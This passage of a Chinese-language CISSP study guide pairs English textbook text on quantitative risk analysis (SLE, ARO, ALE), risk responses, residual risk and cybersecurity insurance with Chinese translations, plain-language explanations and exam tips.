公共或订阅风险登记册/日志、与顾问合作,或使用风险管理软件解决方案来确 定。 单次损失预期 单次损失预期(SLE) 是指针对特定资产的单一已实现威胁 所关联的潜在损失。 它表明,如果某一资产因特定威胁而受损,组织可能 或将会遭受的损失金额。 SLE 使用以下公式计算: SLE = asset value (AV) * exposure factor (EF) 或更简单地: SLE = AV * EF SLE 以美元金额表示。 例如,如果某一资产价值为 200,000 美元,且其 针对某一特定威胁的暴露因子(EF)为 45%,则该威胁对该资产的 SLE 为 90,000 美元。 并非总是需要计算 SLE,因为在确定关键性优先级 时,ALE 是最常需要的值。 因此,在风险计算过程中,有时会完全跳过 SLE。 年化发生率 年化发生率(ARO) 是指在一年内某一特定威胁或风险发生 的预期频率(即变为现实的频率)。 ARO 的范围可以从 0.0(零)开始, 表示该威胁或风险永远不会实现,到一个非常大的数值,表示该威胁或风 险频繁发生。

计算 ARO 可能比较复杂,可通过审查历史内部数据、进行 统计分析、查阅公共或订阅风险登记簿/日志、咨询顾问或使用风险管理软 件解决方案来推导。 某些威胁或风险的 ARO 可通过将单次发生的可能性 乘以可能引发该威胁的用户数量来计算。 ARO 也被称为概率确定。 以下 是一个示例:塔尔萨地震的 ARO 可能为 0.00001,而旧金山地震的 ARO 可能为 0.03(针对 6.7+ 级地震),或者你可以比较塔尔萨地震的 ARO(0.00001)与塔尔萨办公室电子邮件病毒的 ARO(10,000,000)。 年化预期损失 年化预期损失(ALE)是指特定威胁对特定资产造成的所有实例的潜在年度 损失。 ALE 是

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 168 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 30 / PDF P169

应有谨慎与尽职调查

一个偏采取合理行动,一个偏持续验证监督。

教材原文段落

calculated using the following formula: ALE = single loss expectancy (SLE) * annualized rate of occurrence (ARO) or ALE = asset value (AV) * exposure factor (EF) * annualized rate of occurrence (ARO) or more simply: ALE = SLE * ARO or ALE = AV * EF * ARO For example, if the SLE of an asset is $90,000 and the ARO for a specific threat (such as total power loss) is .5, then the ALE is $45,000. If the ARO for a specific threat (such as a compromised user account) is 15 for the same asset, then the ALE would be $1,350,000. The task of calculating EF, SLE, ARO, and ALE for every asset and every threat/risk is a daunting one.

Fortunately, quantitative risk assessment software tools can simplify and automate much of this process. These tools produce an asset inventory with valuations and then, using predefined AROs along with some customizing options (industry, geography, IT components, and so on), produce risk analysis reports. Once an ALE is calculated for each asset-threat pairing, then the entire collection should be sorted from largest ALE to smallest. Although the actual number of the ALE is not an absolute number (it is an amalgamation of intangible and tangible value multiplied by a future prediction of loss multiplied by a future prediction of likelihood), it does have relative value.

The largest ALE is the biggest problem the organization is facing and, thus, the first risk to be addressed in risk response. The “Cost vs. Benefit of Security Controls” section, later in this chapter, discusses the various formulas associated with quantitative risk analysis that you should be familiar with. Both the quantitative and qualitative risk analysis mechanisms offer useful results. However, each technique involves a unique method of evaluating the same set of assets and risks. Prudent due care requires that both methods be

中文直译 / 整理

使用以下公式计算的: ALE = 单次损失预期 (SLE) * 年化发生率 (ARO) or ALE = 资产价值 (AV) * 暴露因子 (EF) * 年化发生率 发生率 (ARO) or 更简单地说: ALE = SLE * ARO or ALE = AV * EF * ARO 例如,如果某资产的SLE为90,000美元,且特定威胁(如完全断电)的 ARO为0.5,则ALE为45,000美元。 如果同一资产的特定威胁(如用户账 户被入侵)的ARO为15,则ALE为1,350,000美元。 为每个资产和每种威胁/风险计算EF、SLE、ARO和ALE是一项艰巨的任务。 幸运的是,定量风险评估软件工具可以简化并自动化这一过程的大部分内容。 这些工具会生成一份包含估值的资产清单,然后利用预定义的ARO以及一些 自定义选项(行业、地理区域、IT组件等),生成风险分析报告。 一旦为每个资产‑威胁组合计算出ALE,就应将整个集合按ALE从大到小排序。 尽管ALE的实际数值并非绝对数值(它是有形和无形价值的综合,乘以对未来 损失的预测,再乘以对未来可能性的预测),但它具有相对价值。

最大的 ALE是组织面临的最主要问题,因此应作为风险应对的首要风险进行处理。 本章后面部分的“安全控制的成本与收益”一节,讨论了您应熟悉的与定量风 险分析相关的各种公式。 定量和定性风险分析机制都能提供有用的结果。 然而,每种技术都采用独特的 方法评估同一组资产和风险。 审慎的注意义务要求同时使用这两种方法,

小白解释

场景先行:你是公司的安全负责人,正在读第 169 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:一个偏采取合理行动,一个偏持续验证监督。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

应有谨慎:应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“应有谨慎与尽职调查”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Due care 偏“做正确的事”。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
应有谨慎 应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 31 / PDF P170

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

employed in order to obtain a balanced perspective on risk. Table 2.1 describes the benefits and disadvantages of these two systems. TABLE 2.1 Comparison of quantitative and qualitative risk analysis Characteristic QualitativeQuantitative Employs math functions No Yes Uses cost/benefit analysis May Yes Requires estimation Yes Some Supports automation No Yes Involves a high volume of information No Yes Is objective Less so More so Relies substantially on opinion Yes No Requires significant time and effort Sometimes Yes Offers useful and meaningful results Yes Yes At this point, the risk management process shifts from risk assessment to risk response.

Risk assessment is used to identify the risks and set criticality priorities, and then risk response is used to determine the best defense for each identified risk. However, identified risks need to be prioritized before any response strategies can be selected or implemented. Prioritization in risk management is the process of systematically ranking and organizing risks based on their significance, potential impact, likelihood, or other relevant criteria. The objective of prioritization is to identify and focus on the most critical or high-priority risks so that limited resources, time, and attention can be allocated effectively to address them.

Prioritization is a fundamental step in the risk management process, helping organizations make informed decisions about risk mitigation and risk response strategies. Risk prioritization (or criticality prioritization) can be as simple as ordering risks from worst to least unfavorable or sorting ALEs from largest to smallest. However, complex and integrated risk analysis methods may integrate qualitative and quantitative elements together, making the prioritization process a less than simple process. Risk Responses Whether a quantitative or qualitative risk assessment was performed, there are many elements of risk response that apply equally to both approaches.

中文直译 / 整理

以获得对风险的平衡视角。 表 2.1 描述了这两种系统的优缺点。 表 2.1 定量与定性风险分析的比较 特征 定性 定量 使用数学函数 No Yes 使用成本/效益分析 May Yes 需要估算 Yes Some 支持自动化 No Yes 涉及大量信息 否 Yes 是客观的 较少如此 更多如此 在很大程度上依赖于主观意见 Yes No 需要大量时间和精力 有时 Yes 提供有用且有意义的结果 Yes Yes 在此阶段,风险管理过程从风险评估转向风险应对。 风险评估用于识别风险并 设定重要性优先级,然后风险应对用于确定每个已识别风险的最佳防御措施。 然而,在选择或实施任何应对策略之前,需要对已识别的风险进行优先级排序。 风险管理中的优先级排序是根据风险的重要性、潜在影响、可能性或其他相关 标准系统性地对风险进行排名和组织的过程。 优先级排序的目标是识别并集中 关注最重要或高优先级的风险,以便有效分配有限的资源、时间和注意力来应 对这些风险。 优先级排序是风险管理过程中的一个基本步骤,有助于组织就风 险缓解和风险应对策略做出明智决策。

风险优先级排序(或重要性优先级排序) 可以简单到将风险按最严重到最不严重排序,或将ALE按从大到小排序。 然而, 复杂且集成的风险分析方法可能会将定性和定量元素结合起来,使优先级排序 过程变得不那么简单。 风险应对措施 无论进行了定量还是定性风险评估,风险应对的许多要素都适用于这两种方法。

小白解释

场景先行:你是公司的安全负责人,正在读第 170 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
学习单元 32 / PDF P171

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Once the risk analysis is complete, management must address each specific risk. There are several possible responses to risk: Mitigation or reduction Assignment or transfer Deterrence Avoidance Acceptance Reject or ignore These risk responses are all related to an organization's risk appetite and risk tolerance. Risk appetite is the total amount of risk that an organization is willing to shoulder in aggregate across all assets. Risk capacity is the level of risk an organization is able to shoulder. An organization's desired risk appetite may be greater than its actual capacity. Risk tolerance is the amount or level of risk that an organization will accept per individual asset-threat pair.

This is often related to a risk target, which is the preferred level of risk for a specific asset-threat pairing. A risk limit is the maximum level of risk above the risk target that will be tolerated before further risk management actions are taken. You need to know the following information about the possible risk responses: Risk Mitigation Reducing risk, or risk mitigation, is the implementation of safeguards, security controls, and countermeasures to reduce and/or eliminate vulnerabilities or block threats. Deploying encryption and using firewalls are common examples of risk mitigation or reduction.

Elimination of an individual risk can sometimes be achieved, but typically, some risk remains even after mitigation or reduction efforts. Risk Assignment Assigning risk or transferring risk is the placement of the responsibility of loss due to a risk onto another entity or organization. Purchasing cybersecurity insurance or traditional insurance and outsourcing are common forms of assigning or transferring risk. Aka assignment of risk and transference of risk.

中文直译 / 整理

一旦风险分析完成,管理层必须应对每项具体风险。 风险的应对措施有多种: 缓解或减少 分配或转让 威慑 回避 接受 拒绝或忽略 这些风险应对措施均与组织的风险偏好和风险承受能力相关。 风险偏好是指组 织在所有资产上总体愿意承担的风险总量。 风险承受能力是指组织能够承担的 风险水平。 组织期望的风险偏好可能高于其实际承受能力。 风险容忍度是指组 织对每个单独资产‑威胁对所能接受的风险量或水平。 这通常与风险目标相关, 风险目标是指特定资产‑威胁配对的首选风险水平。 风险限额是指在风险目标之 上,组织在采取进一步风险管理措施前所能容忍的最大风险水平。 您需要了解有关可能风险应对措施的以下信息: 风险缓解 降低风险,或风险缓解,是指实施防护措施、安全控制和应对措施, 以减少和/或消除脆弱性或阻止威胁。 部署加密技术和使用防火墙是风险缓解 或降低的常见示例。 有时可以完全消除单一风险,但通常即使在缓解或降低 之后,仍会残留部分风险。 风险分配 分配风险 或 转移风险 是将因风险造成的损失责任转移给另一实体 或组织。 购买网络安全保险或传统保险以及外包是分配或转移风险的常见形 式。 也称为风险分配和风险转移。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 33 / PDF P172

应有谨慎与尽职调查

一个偏采取合理行动,一个偏持续验证监督。

教材原文段落

Risk Deterrence Risk deterrence is the process of implementing deterrents to would-be violators of security and policy. The goal is to convince a threat agent not to attack. Some examples include implementing auditing, security cameras, and warning banners; using security guards; and making it known that the organization is willing to cooperate with authorities and prosecute those who participate in cybercrime. Risk Avoidance Risk avoidance is the process of selecting alternate options or activities that have less associated risk than the default, common, expedient, or cheap option. For example, choosing to fly to a destination instead of driving to it is a form of risk avoidance.

Another example is to locate a business in Arizona instead of Florida to avoid hurricanes. The risk is avoided by eliminating the risk cause. A business leader terminating a business endeavor because it does not align with organizational objectives and that has a high risk-versus-reward ratio is also an example of risk avoidance. Risk Acceptance Accepting risk, or acceptance of risk, is the result after a cost/benefit analysis shows countermeasure costs would outweigh the possible cost of loss due to a risk. It also means that management has agreed to accept the consequences and the loss if the risk is realized.

In most cases, accepting risk requires a clearly written statement that indicates why a safeguard was not implemented, who is responsible for the decision, and who will be responsible for the loss if the risk is realized, usually in the form of a document signed by senior management. Risk Rejection An unacceptable possible response to risk is to reject risk or ignore risk. Denying that a risk exists and hoping that it will never be realized are not valid or prudent due care/due diligence responses to risk. Rejecting or ignoring risk may be considered negligence in court.

Inherent risk is the level of natural, native, or default risk in an environment, system, or product before any risk management efforts are performed. Inherent risk can exist due to the supply chain, developer operations, design and architecture of a system, or an organization's knowledge and skill base. Inherent risk is also known as initial risk or starting risk. This is the risk that is identified by the risk assessment process. Once safeguards, security controls, and countermeasures are implemented, the risk that remains is known as residual risk. Residual risk consists of

中文直译 / 整理

风险威慑 风险威慑 是实施威慑措施以阻止潜在的安全和政策违规者的过程。 目标是说服威胁主体不要发动攻击。 一些示例包括实施审计、安全摄像头 和警告横幅; 使用安保人员; 以及让公众知晓该组织愿意配合执法部门并 起诉参与网络犯罪的人员。 风险规避 风险规避 是选择替代选项或活动,以降低相比默认、常见、便捷 或低成本选项所伴随的风险。 例如,选择乘飞机而非驾车前往目的地是一 种风险规避方式。 另一个例子是在亚利桑那州而非佛罗里达州设立企业, 以避免飓风。 通过消除风险根源来规避风险。 企业领导者因某项业务与组 织目标不符且风险与回报比例过高而终止该业务,也是风险规避的一个例 子。 风险接受 接受风险 是在成本/效益分析显示,防范措施的成本将超过风险 可能造成的损失时的结果。 这也意味着管理层已同意接受风险实现后的后 果和损失。 在大多数情况下,接受风险需要一份明确的书面声明,说明未 实施防护措施的原因、决策责任人,以及若风险实现时谁将负责承担损失, 通常以高级管理层签署的文件形式呈现。 风险拒绝 接受风险的不可接受的可能应对方式是 拒绝风险 或 忽视风险。

否 认风险的存在并希望它永远不会发生,不是对风险采取合理注意/尽职调查的 合法或审慎应对方式。 在法庭上,拒绝或忽视风险可能被视为疏忽。 固有风险 是指在未采取任何风险管理措施之前,环境、系统或产品中自然存在 的、原始的或默认的风险水平。 固有风险可能源于供应链、开发人员操作、系 统的结构和架构,或组织的知识与技能基础。 固有风险也称为 初始风险 或 起 始风险。 这是通过风险评估过程识别出的风险。 一旦实施了防护措施、安全控制和应对措施,剩余的风险被称为残留风险。 残留风险包括

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:一个偏采取合理行动,一个偏持续验证监督。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

审计:审计记录主体行为,用于追责、复盘和取证。

应有谨慎:应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“应有谨慎与尽职调查”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

没有日志和身份绑定,就很难问责。

Due care 偏“做正确的事”。

Due diligence 偏“确认事情被正确执行”。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
审计 审计记录主体行为,用于追责、复盘和取证。
应有谨慎 应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 34 / PDF P173

第 173 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

threats to specific assets against which upper management chooses not to implement a response. In other words, residual risk is the risk that management has chosen to accept rather than mitigate. In most cases, the presence of residual risk indicates that the cost/benefit analysis showed that the available safeguards were not cost-effective deterrents. Total risk is the amount of risk an organization would face if no safeguards were implemented. A conceptual formula for total risk is as follows: threats and vulnerabilities and asset value = total risk The difference between total risk and residual risk is known as the controls gap.

The controls gap is the amount of risk that is reduced by implementing safeguards. A conceptual formula for residual risk is as follows: total risk – controls gap = residual risk As with risk management in general, handling risk is not a onetime process. Instead, security must be continually maintained and reaffirmed. In fact, repeating the risk assessment and risk response processes is a necessary function to assess the completeness and effectiveness of the security program over time. Additionally, it helps locate deficiencies and areas where change has occurred. Since security changes over time, reassessing on a periodic basis is essential to maintaining reasonable security.

Control risk is the risk that is introduced by the introduction of the countermeasure to an environment. Most safeguards, security controls, and countermeasures are themselves some sort of technology. No technology is perfect, and no security is perfect, so some vulnerability exists in regard to the control itself. Although a control may reduce the risk of a threat to an asset, it may also introduce a new risk of a threat that can compromise the control itself. Thus, risk assessment and response must be an iterative operation that looks back on itself to make continuous improvements.

Cybersecurity Insurance Cybersecurity insurance, also known as cyber insurance or cyber risk insurance, is a type of insurance policy that provides coverage and financial protection to organizations or individuals in the event of cyber-related incidents, data breaches, or cyberattacks. This form of insurance is designed to help mitigate the financial and legal consequences of cybersecurity

中文直译 / 整理

高层管理选择不采取应对措施的针对特定资产的威胁。 换句话说,残留风险是 管理层选择接受而非缓解的风险。 在大多数情况下,残留风险的存在表明成本 效益分析显示,现有的防护措施并非具有成本效益的威慑手段。 总风险是指在未实施任何防护措施的情况下,组织所面临的风险总量。 总风险的 概念公式如下: 威胁与脆弱性及资产价值 = 总风险 总风险与残余风险之间的差值称为控制差距。 控制差距是指通过实施防护措 施所降低的风险量。 残余风险的概念公式如下: total risk – controls gap = residual risk 与一般风险管理一样,风险处理并非一次性过程。 相反,安全必须持续维护和 不断确认。 事实上,重复进行风险评估和风险应对过程,是评估安全计划在时 间维度上的完整性和有效性的必要功能。 此外,它还有助于发现缺陷以及发生 变化的领域。 由于安全状况会随时间变化,定期重新评估对于维持合理的安全 性至关重要。 控制风险是指在环境中引入对策时所带来的风险。 大多数防护措施、安全控 制和对策本身都属于某种技术。 没有任何技术是完美的,也没有任何安全是 完美的,因此控制自身仍存在某些脆弱性。

尽管一项控制措施可能降低对资 产的威胁风险,但它也可能引入一种新的风险,即可能危及该控制措施本身 的威胁。 因此,风险评估与应对必须是一个迭代过程,需要不断回顾自身以 实现持续改进。 网络安全保险 网络安全保险,又称网络保险或网络风险保险,是一种保险单,可在发生网 络相关事件、数据泄露或网络攻击时为组织或个人提供保障和财务保护。 这 种保险形式旨在帮助缓解网络安全

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 173 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

哈希、数字签名、变更控制、输入校验常对应完整性。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 35 / PDF P174

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

breaches, which can result in data loss, financial loss, legal liabilities, and reputational damage. It is a form of risk assignment response. Key features and aspects of cybersecurity insurance include: Coverage for data breaches. Cybersecurity insurance typically covers the costs associated with data breaches, including expenses related to notifying affected individuals, credit monitoring services, and the costs of investigating and mitigating the breach. Financial loss protection. It provides coverage for financial losses resulting from cyberattacks, such as theft of funds, fraudulent transactions, and extortion payments demanded by cybercriminals. Legal liabilities.

Cyber insurance can cover legal expenses and liability costs associated with cybersecurity incidents, including lawsuits, regulatory fines, and penalties for noncompliance with data protection regulations. Reputation management. Some policies include coverage for expenses related to reputation management and public relations efforts to rebuild trust with customers and stakeholders after a data breach. Business interruption. Cyber insurance may offer coverage for losses related to business interruption caused by a cyber incident. This can include income loss due to system downtime. Ransomware protection.

Many policies include coverage for ransomware attacks and may cover ransom payments, investigation costs, and remediation. Forensic services. Insurers often provide access to cybersecurity experts and forensic services to investigate and assess the extent of a breach. Incident response. Cyber insurance may include support for incident response planning and coordination, helping organizations navigate the complexities of managing a cyber incident. Regulatory compliance. Policies may cover expenses related to regulatory compliance and fines, particularly in cases where data protection laws have been violated. Third-party liability.

Coverage may extend to liabilities arising from third parties, such as vendors, partners, and customers, who are affected by a cybersecurity incident involving the insured organization.

中文直译 / 整理

泄露所带来的数据丢失、财务损失、法律责任和声誉损害。 这是一种风险分担 应对措施。 网络安全保险的关键特征和方面包括: 数据泄露的保障。 网络安全保险通常涵盖与数据泄露相关的费用 , 包括 g exp与 通知受影响个人、信用监控服务以及 调查和缓解泄露事件的费用。 财务损失保障。 它提供针对网络攻击导致的财务损失的保障,例如 资金被盗、欺诈性交易以及网络犯罪分子勒索的付款。 法律责任。 网络安全保险可涵盖与网络安全事件相关的法律费用和责任 成本,包括诉讼、监管罚款以及违反数据保护 法规的处罚。 声誉管理。 一些保单包括涵盖声誉管理和公共关系支出的保障,以便在数 据泄露后重建客户和利益相关者的信任。 业务中断。 网络安全保险可能提供因网络事件导致的业务中断损失的 保障,这包括因系统停机造成的收入损失。 勒索软件保护。 许多保单包括对勒索软件攻击的保障,并可能涵盖勒索付款、 调查费用和 补救措施。 法务服务。 保险公司通常提供网络安全专家和法务服务,以调查和评估数据 泄露的范围。 事件响应。 网络保险可能包括对事件响应计划和协调的支持,帮助组织 应对管理网络事件的复杂性。 监管合规。

保单可能涵盖与监管合规及罚款相关的费用,特别是 在违反数据保护法律的情况下。 第三方责任。 保障范围可能涵盖因网络安全事件涉及被保险组织而受 到影响的第三方(如供应商、合作伙伴和客户)所引发的责任。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

事件响应:事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

准备、检测、遏制、根除、恢复、经验教训是常见顺序。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
学习单元 36 / PDF P175

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Cybersecurity insurance is often an essential component of an organization's risk management strategy, especially as cyberthreats continue to evolve and pose significant financial and operational risks. It helps businesses and individuals transfer some of the financial risks associated with cybersecurity incidents to insurance providers, reducing the potential financial burden and providing peace of mind in the face of cyberthreats. However, it's crucial for policyholders to carefully review the terms, coverage limits, and conditions of their cyber insurance policies to ensure they meet their specific needs and risk profile. Cost vs.

Benefit of Security Controls Often, additional calculations are involved in risk response when a quantitative risk assessment is performed. These relate to the mathematical evaluation of the cost/benefit of a safeguard. For each identified risk in criticality priority order, safeguards are considered in regard to their potential loss reduction and benefit potential. For each asset-threat pairing (i.e., identified risk), an inventory of potential and available safeguards must be made. This may include investigating the marketplace, consulting with experts, and reviewing security frameworks, regulations, and guidelines.

